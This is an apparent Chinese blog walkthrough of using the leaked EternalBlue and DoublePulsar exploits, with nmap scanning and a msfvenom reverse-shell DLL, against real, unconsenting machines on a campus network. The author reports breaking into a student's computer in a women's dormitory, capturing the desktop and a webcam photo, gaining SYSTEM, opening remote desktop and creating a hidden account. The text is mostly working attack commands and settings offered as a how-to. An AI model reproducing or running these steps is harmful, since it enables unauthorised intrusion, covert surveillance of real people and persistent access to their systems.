Windows漏洞实战,盲打女寝
准备环境
kalilinux 监听机,或者装有msf和nmap的linux即可,桥接物理机网络
win03 攻击机 python2.6 + pywin32 环境 桥接
exp下载链接https://github.com/misterch0c/shadowbroker
1
2
python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
1
2
3
pywin32-221.win32-py2.6.exe
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
靶机:不用本地的靶机,虽然测试成功了,但是要实战才有意思。所以扫本地的C段。
配置攻击机1【win2003】
把下载的exp压缩包中Windows目录解压到攻击机上,不要解压到有中文目录的路径,不然会报错,解压完后,我们在Windows目录下新建一个空目录“listeningposts”,为什么要建立这个目录,因为fb.py中有个遍历目录的参数,对应的就是这个目录,默认是没有的。
利用nmap扫下C段,看有哪些机器开了445端口,主要针对win4 64 的主机进行试验。
nmap -p445-O10.20.70.0/24
扫描整个C段开放445端口的主机,并且探测系统版本。
针对目标主机 10.20.70.x
然后运行fb.py脚本,设置参数
攻击目标
[?] Default Target IP Address [] : 10.20.70.x
本机IP
[?] Default Callback IP Address [] : 10.20.88.207
是否重定向
[?] Use Redirection [yes] : no
是否输出日志
[?] Base Log directory [D:\logs] : no
根据提示,新建一个项目,然后默认设置,直到设置
use eternalblue
设置好选择Yes,然后一路回车默认,直到出现选择针对的目标系统和加载的MODE
这里我都选择1,因为我针对的系统是X64的win7,MODE用本身自带的一个fuzz框架。然后一路YES回车,直到出现
输入 use doublepulsar
然后一样默认设置回车yes,直到出现要我们再次设置攻击目标的信息,选择SMB服务,x64系统,利用RunDLL模块。
到这里,配置这个exp已经差不多了,这时候打开kalilinux,利用msf配置一个DLL的后门,因为刚才我的fb.py利用的模块是RUNDLL。
配置攻击机2【kalilinux】
利用msf生成一个x64位的dll后门
1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.20.89.101LPORT=5555-f dll > s.dll
然后msfconlse 打开msf
设置参数开启侦听
msf > use exploit/multi/handler
msf exploit(handler) >setpayloadwindows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msfexploit(handler) > set lhost 10.20.89.101
lhost=> 10.20.89.101
msfexploit(handler) > set lport 5555
lport=> 5555
msfexploit(handler) > exploit
设置完kalilinux,把刚才生成的dll后门,放到win03攻击机1的C盘目录下。
然后在攻击机1下设置开始攻击。
这时候,kalilinux下反弹了一个shell回来,成功了,HELP一下,看看这个shell有什么功能
功能挺多,运行一下截图桌面的命令。
screenshot
原来在看爱奇艺
看到拍照功能,试验一下。
webcam_snap
竟然一不小心盲到了女寝的C段,学校的wif IP是随机分配的,好吧,我不是有意的,因为隐私问题固打码,看样子妹子也是一脸懵逼,估计摄像头的灯亮了下。:P
运行shell,获取一个system的权限,利用命令开3389,并且创建隐藏账户
congtou